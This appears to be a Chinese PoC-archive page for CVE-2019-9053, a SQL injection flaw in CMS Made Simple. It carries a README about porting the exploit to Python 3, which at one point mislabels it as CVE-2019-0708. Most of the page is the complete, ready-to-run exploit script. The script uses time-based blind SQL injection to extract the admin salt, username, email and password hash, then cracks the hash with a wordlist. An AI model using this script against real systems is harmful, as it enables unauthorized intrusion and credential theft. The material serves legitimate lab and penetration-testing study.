关联漏洞
标题:CMS Made Simple SQL注入漏洞 (CVE-2019-9053)描述:CMS Made Simple(CMSMS)是CMSMS团队的一套开源的内容管理系统(CMS)。该系统支持基于角色的权限管理系统、基于向导的安装与更新机制、智能缓存机制等。 CMSMS 2.2.8版本中存在SQL注入漏洞,该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
描述
Exploits Python cve-2019-9053– by HackHeart
介绍
# -exploit-lab
Exploits Python cve-2019-0708 – by HackHeart
🧠 Code Review & Porting - Python 2 → Python 3
This exploit was originally written in Python 2, which is no longer supported by modern systems. To ensure compatibility and maintain future-proof tooling, the entire codebase has been carefully reviewed and migrated to Python 3.
🔧 Key improvements during the port:
Updated print statements to Python 3 syntax
Replaced raw_input() with input()
Adapted socket operations to handle byte/str properly (.decode() added)
Removed deprecated methods like xrange() and .iteritems()
Validated script compatibility with Python 3.8+ and modern Linux distros
🛡️ This version maintains the exploit logic intact while ensuring:
Compatibility with modern OSCP / Red Team labs
Cleaner, safer, and more readable syntax
Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection
import requests
import time
import argparse
import hashlib
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()
url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1
flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""
def dump_field(field_name, table, column, condition):
global flag
result = ""
ord_result = ""
while flag:
flag = False
for char in dictionary:
temp_result = result + char
ord_temp_result = ord_result + format(ord(char), "x")
print(f"[*] Trying {temp_result}")
payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
start_time = time.time()
session.get(url_vuln + "&m1_idlist=" + payload)
if time.time() - start_time >= TIME:
result = temp_result
ord_result = ord_temp_result
flag = True
break
return result
print("[+] Extracting salt...")
flag = True
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"
print("[+] Extracting username...")
flag = True
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"
print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"
print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"
if args.crack and args.wordlist:
print("[+] Cracking password...")
with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
word = line.strip()
print(f"[*] Trying password: {word}")
if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
output += f"[+] Password cracked: {word}\n"
break
print("\n=== Exploit Results ===")
print(output)
文件快照
[4.0K] /data/pocs/09899c31d7e3c938326af9c8d2933276160ca66c
├── [2.6K] cve_2019_9053_python3.py
└── [3.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。